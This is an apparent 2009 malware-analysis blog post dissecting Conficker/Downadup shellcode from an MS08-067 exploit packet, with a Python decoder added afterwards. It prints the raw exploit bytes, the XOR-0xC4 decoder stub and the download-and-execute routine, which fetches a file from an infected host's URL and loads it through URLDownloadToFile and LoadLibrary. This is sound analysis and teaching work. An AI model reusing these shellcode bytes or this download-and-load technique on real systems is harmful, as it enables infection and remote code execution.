Sunday, February 01, 2009

Shellcode (x73 x68 x65 x6C x6C x63 x6F x64 x65)

Shellcode is fun to analyze, and it is interesting to see what attackers throw into the mix to make finding the payload harder. Recently I was taking a look at the Conficker/Downadup shellcode that is used in conjunction with the MS08-067 vulnerability. First we start with the packet data:

17:18:12.869891 IP (tos 0x0, ttl 128, id 164, offset 0, flags [DF], proto: TCP (6), length: 832) 192.168.248.128.1048 > 192.168.248.1.445: P, cksum 0x41fa (correct), 1136:1928(792) ack 927 win 63314
0x0000: 4500 0340 00a4 4000 8006 8540 c0a8 f880 E..@..@....@....
0x0010: c0a8 f801 0418 01bd 836c c50d d4ef d3fb .........l......
0x0020: 5018 f752 41fa 0000 0000 0314 ff53 4d42 P..RA........SMB
0x0030: 2500 0000 0018 07c8 0000 0000 0000 0000 %...............
0x0040: 0000 0000 0008 4004 0008 8000 1000 00c0 ......@.........
0x0050: 0200 0000 0400 0000 0000 0000 0000 0000 ................
0x0060: 0054 00c0 0254 0002 0026 0000 40d1 0200 .T...T...&..@...
0x0070: 5c00 5000 4900 5000 4500 5c00 0000 0000 \.P.I.P.E.\.....
0x0080: 0500 0003 1000 0000 c002 0000 0100 0000 ................
0x0090: a802 0000 0000 1f00 2c15 ce00 0600 0000 ........,.......
0x00a0: 0000 0000 0600 0000 4800 4800 4400 4800 ........H.H.D.H.
0x00b0: 4800 0000 3101 0000 0000 0000 3101 0000 H...1.......1...
0x00c0: 5c00 7074 7a55 6751 515a 624b 7854 6374 \.ptzUgQQZbKxTct
0x00d0: 474d 5046 426f 6e4c 4655 7271 4343 6d44 GMPFBonLFUrqCCmD
0x00e0: 624a 544b 4e79 6749 4770 4e45 5246 7756 bJTKNygIGpNERFwV
0x00f0: 5878 416a 4266 6242 5554 716a 5143 4e74 XxAjBfbBUTqjQCNt
0x0100: 5a65 4f73 4b79 5847 7a58 7448 6641 7276 ZeOsKyXGzXtHfArv
0x0110: 4572 615a 786b 627a 5868 5974 4459 7245 EraZxkbzXhYtDYrE
0x0120: 7961 6e48 676d e8ff ffff ffc1 5e8d 4e10 yanHgm......^.N. <-Shellcode Start
0x0130: 8031 c441 6681 3945 5075 f5ae c69d a04f .1.Af.9EPu.....O
0x0140: 85ea 4f84 c84f 84d8 4fc4 4f9c cc49 7258 ..O..O..O.O..IrX
0x0150: c4c4 c42c edc4 c4c4 9426 3c4f 3892 3bd3 ...,.....&
0x0160: 5747 02c3 2cdc c4c4 c4f7 1696 964f 08a2 WG..,........O..
0x0170: 03c5 bcea 953b b3c0 9696 9592 963b f33b .....;.......;.;
0x0180: 2469 9592 514f 8ff8 4f88 cfbc c70f f732 $i..QO..O......2
0x0190: 49d0 77c7 95e4 4fd6 c717 f704 0504 c3f6 I.w...O.........
0x01a0: c686 44fe c4b1 31ff 01b0 c282 ffb5 dcb6 ..D...1.........
0x01b0: 1b4f 95e0 c717 cb73 d0b6 4f85 d8c7 074f .O.....s..O....O
0x01c0: c054 c707 9a9d 07a4 664e b2e2 4468 0cb1 .T......fN..Dh..
0x01d0: b6a8 a9ab aac4 5de7 991d acb0 b0b4 feeb ......].........
0x01e0: ebf5 fdf6 eaf5 f2fc eaf6 f0fc eaf5 f6fc ................
0x01f0: fefc f5f5 fdeb a6a1 a7a1 b6c4 4550 7257 ............EPrW
0x0200: 786f 5741 7659 4161 6e78 7650 7842 666e xoWAvYAanxvPxBfn
0x0210: 5541 4d57 7267 4e6a 7077 6650 6f48 587a UAMWrgNjpwfPoHXz
0x0220: 6567 6868 7854 6949 4564 774a 5369 764f eghhxTiIEdwJSivO
0x0230: 6352 505a 4d75 7946 7771 6245 694b 777a cRPZMuyFwqbEiKwz
0x0240: 5972 4768 7046 6d4e 6a6d 5371 4264 4c57 YrGhpFmNjmSqBdLW
0x0250: 6e4d 4b64 6544 434d 696e 4c6c 4e79 7342 nMKdeDCMinLlNysB
0x0260: 456b 6272 6c6b 7163 437a 5854 6e55 4f5a EkbrlkqcCzXTnUOZ
0x0270: 4256 4c69 5547 686b 6166 6242 5961 554b BVLiUGhkafbBYaUK
0x0280: 506e 4165 6849 5749 4e61 4f75 6f77 7947 PnAehIWINaOuowyG
0x0290: 7857 6f63 436d 714b 5651 426a 636d 586d xWocCmqKVQBjcmXm
0x02a0: 5453 5063 546c 4242 4d4a 654e 7058 5757 TSPcTlBBMJeNpXWW
0x02b0: 617a 5257 6772 5c00 2e00 2e00 5c00 2e00 azRWgr\.....\...
0x02c0: 2e00 5c00 4100 5400 4f00 5a00 4d00 5500 ..\.A.T.O.Z.M.U.
0x02d0: 4500 0804 0200 e216 896f 454f 575a 27f7 E........oEOWZ'.
0x02e0: 886f 4958 484a 524f 5843 5842 5957 5a58 .oIXHJROXCXBYWZX
0x02f0: 4f4e 4c4b 524f 5046 4746 424c 5256 5143 ONLKROPFGFBLRVQC
0x0300: 5752 4f51 554a 544e 4659 474a 924a 24b6 WROQUJTNFYGJ.J$.
0x0310: 9703 f537 eb62 5159 5743 5357 4a42 4b50 ...7.bQYWCSWJBKP
0x0320: 0000 7700 1f03 0000 0200 0000 0000 0000 ..w.............
0x0330: 0200 0000 5c00 0000 0101 0000 0000 0000 ....\...........

This is the Server service packet; the path it carries contains the overflow and the shellcode.

Finding the beginning of the shellcode can at times be a bit tricky. We know it is in here, but there is no clear beginning. The first thing I look for is a 0xEB followed by a small value, i.e. a short “Jump” instruction. Here there is no clear sign, and tracing all instances of 0xEB in IDA Pro does not yield any valid code. What caught my eye instead was, in the middle at offset 0x0134, a 0xE8 0xFF etc., which looks like a “Call” instruction to a previous address. We’ll start here.

Attempting to disassemble at 0x0134 yields:

seg000:00000134 loc_134: ; CODE XREF: seg000:loc_134p
seg000:00000134 call near ptr loc_134+4
seg000:00000139 rcr dword ptr [esi-73h], 4Eh
seg000:0000013D adc [eax+6641C431h], al
seg000:00000143 cmp dword ptr [ecx], 0F5755045h
seg000:00000149 scasb
seg000:0000014A mov byte ptr [ebp-157AB060h], 4Fh ; 'O'
seg000:00000151 test cl, al
seg000:00000153 dec edi
seg000:00000154 test bl, al
seg000:00000156 dec edi
seg000:00000157 les ecx, [edi-64h]
seg000:0000015A int 3 ; Trap to Debugger
seg000:0000015B dec ecx
seg000:0000015C jb short loc_1B6

The first call is a call to an address inside itself? That is strange:

call near ptr loc_134+4

This calls 0x0138, yet the next instruction begins at 0x139. Let’s right-click, undefine the code, and start disassembling at 0x138:

seg000:00000138 inc ecx
seg000:0000013A pop esi
seg000:0000013B lea ecx, [esi+10h]
seg000:0000013E
seg000:0000013E loc_13E: ; CODE XREF: seg000:00000147j
seg000:0000013E xor byte ptr [ecx], 0C4h
seg000:00000141 inc ecx
seg000:00000142 cmp word ptr [ecx], 5045h
seg000:00000147 jnz short loc_13E
seg000:00000149 scasb
seg000:0000014A mov byte ptr [ebp-157AB060h], 4Fh ; 'O'
seg000:00000151 test cl, al
seg000:00000153 dec edi
seg000:00000154 test bl, al
seg000:00000156 dec edi
seg000:00000157 les ecx, [edi-64h]
seg000:0000015A int 3 ; Trap to Debugger

This is a bit better. The call into itself lands at 0x138 and executes an “inc ecx”, which is inconsequential. The return address the call pushed (0x139) is then popped into ESI, ESI + 0x10 is loaded into ECX, and execution passes to the XOR loop starting at 0x13E. This routine XORs each byte with 0xC4, starting at 0x149, until the word 0x45 0x50 is located, at which point the loop exits. Let’s see what happens when the rest of this code is XOR’d:

seg000:0000013E loc_13E: ; CODE XREF: seg000:00000147j
seg000:0000013E xor byte ptr [ecx], 0C4h
seg000:00000141 inc ecx
seg000:00000142 cmp word ptr [ecx], 5045h
seg000:00000147 jnz short loc_13E
seg000:00000149 push 2
seg000:0000014B pop ecx
seg000:0000014C mov eax, fs:[ecx+2Eh] ; fs:[30]
seg000:00000150 mov eax, [eax+0Ch]
seg000:00000153 mov eax, [eax+1Ch]
seg000:00000156 mov eax, [eax]
seg000:00000158 mov ebx, [eax+8]
seg000:0000015B lea esi, [esi+9Ch] ; 1d5

The new code looks much cleaner now, and it is clear that at 0x14C it looks up the base address of kernel32.dll through the PEB (fs:[30]).

If we look further down, where the match on 0x45 0x50 stopped the XOR loop, we see the name of a module to be loaded, a URL, and several chunks of data that are hashes used to look up API calls.

Commented disassembly:

seg000:000001D5 dd 768AA260h ; ExitThread
seg000:000001D9 dd 0C8AC8026h ; LoadLibrary
seg000:000001DD aUrlmon db 'urlmon'
seg000:000001E3 db 0
seg000:000001E4 dd 0D95D2399h ; URLDownloadToFileA
seg000:000001E8 aHttp192_168_24 db 'http://{infectedIP}:8119/becer'
seg000:00000209 db 0
seg000:0000020A db 45h
seg000:0000020B db 50h ; P <-End of XOR loop
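The decoder stub and the data block it uncovers, re-implemented in Python as an added example (this is not code from the original post). It embeds packet offsets 0x120 through 0x1FF from the hex dump above, locates the “call to itself” (E8 FF FF FF FF) the way the write-up does, derives ECX exactly as the stub does (popped return address + 0x10), runs the XOR-0xC4 loop until the 0x45 0x50 marker, and then pulls the API hashes, the module name and the URL out of the decoded bytes. Two things are inferred rather than copied from the page: the 0xE delta between the IDA addresses and the packet offsets (the call at packet offset 0x126 is loc_134, consistent with the capture having been loaded with its 14-byte Ethernet header), and the fact that the decoded URL contains the lab host 192.168.248.128 from the tcpdump header, which the listing above redacts as {infectedIP}.

```python
"""Re-implementation of the Conficker/MS08-067 shellcode decoder stub analysed above."""
import struct

# Packet offsets 0x0120-0x01ff of the exploit packet, copied from the tcpdump hex dump
# (offset 0x0000 is the start of the IP header). This is the only region the stub touches.
PACKET_0x120 = bytes.fromhex(
    "7961 6e48 676d e8ff ffff ffc1 5e8d 4e10 "
    "8031 c441 6681 3945 5075 f5ae c69d a04f "
    "85ea 4f84 c84f 84d8 4fc4 4f9c cc49 7258 "
    "c4c4 c42c edc4 c4c4 9426 3c4f 3892 3bd3 "
    "5747 02c3 2cdc c4c4 c4f7 1696 964f 08a2 "
    "03c5 bcea 953b b3c0 9696 9592 963b f33b "
    "2469 9592 514f 8ff8 4f88 cfbc c70f f732 "
    "49d0 77c7 95e4 4fd6 c717 f704 0504 c3f6 "
    "c686 44fe c4b1 31ff 01b0 c282 ffb5 dcb6 "
    "1b4f 95e0 c717 cb73 d0b6 4f85 d8c7 074f "
    "c054 c707 9a9d 07a4 664e b2e2 4468 0cb1 "
    "b6a8 a9ab aac4 5de7 991d acb0 b0b4 feeb "
    "ebf5 fdf6 eaf5 f2fc eaf6 f0fc eaf5 f6fc "
    "fefc f5f5 fdeb a6a1 a7a1 b6c4 4550 7257"
)
DUMP_BASE = 0x120   # packet offset of PACKET_0x120[0]
# Inferred, not stated on the page: the IDA addresses sit 0xE above the packet offsets
# (call at packet offset 0x126 == loc_134), i.e. a 14-byte Ethernet header precedes the IP header.
IDA_DELTA = 0x0E

XOR_KEY = 0xC4            # xor byte ptr [ecx], 0C4h
TERMINATOR = b"\x45\x50"  # cmp word ptr [ecx], 5045h -> bytes 45 50 ("EP") in memory


def ida_addr(index):
    """Translate an index into PACKET_0x120 to the address used in the IDA listing."""
    return DUMP_BASE + index + IDA_DELTA


def scan_getpc_candidates(buf):
    """The write-up's heuristic for finding where shellcode starts: a short jump (EB xx with a
    small displacement) or the 'call $-1' trick (E8 FF FF FF FF). Returns (index, mnemonic)."""
    hits = []
    for i in range(len(buf) - 4):
        if buf[i:i + 5] == b"\xe8\xff\xff\xff\xff":
            hits.append((i, "call $-1"))
        elif buf[i] == 0xEB and buf[i + 1] < 0x20:
            hits.append((i, "jmp short +%#x" % buf[i + 1]))
    return hits


def run_decoder_loop(buf, start, key=XOR_KEY, terminator=TERMINATOR):
    """Emulate loc_13E in place:
        xor byte ptr [ecx], key ; inc ecx ; cmp word ptr [ecx], 5045h ; jnz loc_13E
    The compare looks at bytes that have not been decoded yet, so the stop marker is
    searched for in the still-encoded stream. Returns the index of the terminating word."""
    i = start
    while True:
        buf[i] ^= key
        i += 1
        if i + 2 > len(buf):
            raise ValueError("terminator not found; the decoder would run off the buffer")
        if buf[i:i + 2] == terminator:
            return i


def decode_payload(packet=PACKET_0x120):
    """Find the call $-1 stub, derive ECX as the stub does, run the XOR loop and return
    (decoded_bytes, start_index, terminator_index)."""
    buf = bytearray(packet)
    call = next(i for i, m in scan_getpc_candidates(buf) if m == "call $-1")
    ret_addr = call + 5        # address pushed by the call; 'pop esi' retrieves it
    start = ret_addr + 0x10    # lea ecx, [esi+10h]
    end = run_decoder_loop(buf, start)
    return bytes(buf[start:end]), start, end


def extract_artifacts(decoded):
    """Pull out the data block the write-up comments at 1D5-209: two API hashes, the
    'urlmon' module name, the URLDownloadToFileA hash and the download URL."""
    name = decoded.index(b"urlmon\x00")
    exit_thread, load_library = struct.unpack("<II", decoded[name - 8:name])
    (url_download,) = struct.unpack("<I", decoded[name + 7:name + 11])
    url_end = decoded.index(b"\x00", name + 11)
    url = decoded[name + 11:url_end].decode("ascii")
    return {"ExitThread": exit_thread, "LoadLibrary": load_library,
            "URLDownloadToFileA": url_download, "url": url}


if __name__ == "__main__":
    decoded, start, end = decode_payload()
    print("XOR loop starts at %#x, stop marker at %#x" % (ida_addr(start), ida_addr(end)))
    # 6a 02 59 64 8b 41 2e = push 2 / pop ecx / mov eax, fs:[ecx+2Eh]
    print("first decoded bytes:", decoded[:7].hex())
    for key, value in extract_artifacts(decoded).items():
        print(key, hex(value) if isinstance(value, int) else value)
```

Running the script reproduces the listing above: the loop starts at 0x149 and stops at 0x20A, the first decoded bytes are the push 2 / pop ecx / fs:[ecx+2Eh] sequence, and the three hashes come out as 768AA260, C8AC8026 and D95D2399. The emulation keeps the stub's quirk that the terminator check runs on encoded bytes, which is why a 45 50 pair appearing in the decoded code would not stop it but one in the encoded stream would.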

Once these hashes are matched to the exported API calls in kernel32 and urlmon, the shellcode passes the deobfuscated URL to URLDownloadToFile() via a jump.

seg000:00000172 call HashLookup
seg000:00000177 xor edx, edx
seg000:00000179 push edx ; 0
seg000:0000017A push edx
seg000:0000017B mov ecx, esp
seg000:0000017D mov word ptr [ecx], '.x'
seg000:00000182 push ecx ; "x." for LoadLibrary
seg000:00000183 push dword ptr [edi+4]
seg000:00000186 push edx ; lpfnCB = 0
seg000:00000187 push edx ; dwReserved = 0
seg000:00000188 push ecx ; szFileName = "x."
seg000:00000189 push esi ; szURL 1e8
seg000:0000018A push edx ; pCaller = 0
seg000:0000018B push dword ptr [edi] ; Return Address LoadLibrary
seg000:0000018D jmp eax ; URLDownloadToFile

Legend (the pushes were colour-coded in the original listing): one colour marked the URLDownloadToFile argument pushes, the other the LoadLibrary argument pushes; the comments in the listing carry the same information.

The interesting thing here is that before the jump to “URLDownloadToFile”, the address of LoadLibrary is pushed onto the stack as the return address. This means that after the file “becer” is downloaded from the infected machine and written to the file “x.”, URLDownloadToFile returns into LoadLibrary, which loads the file “x.” into the exploited process, thus infecting the system.

All in all this is a simple example of how shellcode gets its job done. This instance was interesting in that it has a few tricks and interesting turns that an analyst can learn from.
